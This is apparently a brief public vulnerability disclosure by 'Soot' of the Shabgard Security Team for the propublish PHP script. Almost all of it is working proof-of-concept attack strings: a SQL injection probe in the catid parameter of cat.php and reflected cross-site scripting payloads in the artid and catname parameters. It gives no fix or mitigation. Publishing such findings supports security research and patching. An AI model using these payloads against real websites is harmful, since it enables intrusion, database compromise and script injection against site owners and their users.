Site:
http://www.deltascripts.com/download/
Bug:
SQL Injection :
http://victim/propublish/cat.php?catid='
XSS :
1- http://victim/propublish/art.php?artid="><script>alert(/Soot/)</script>
2- http://victim/propublish/cat.php?catname="><script>alert(/Soot/)</script>
Source :
http://soot.shabgard.org/bugs/propublish.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org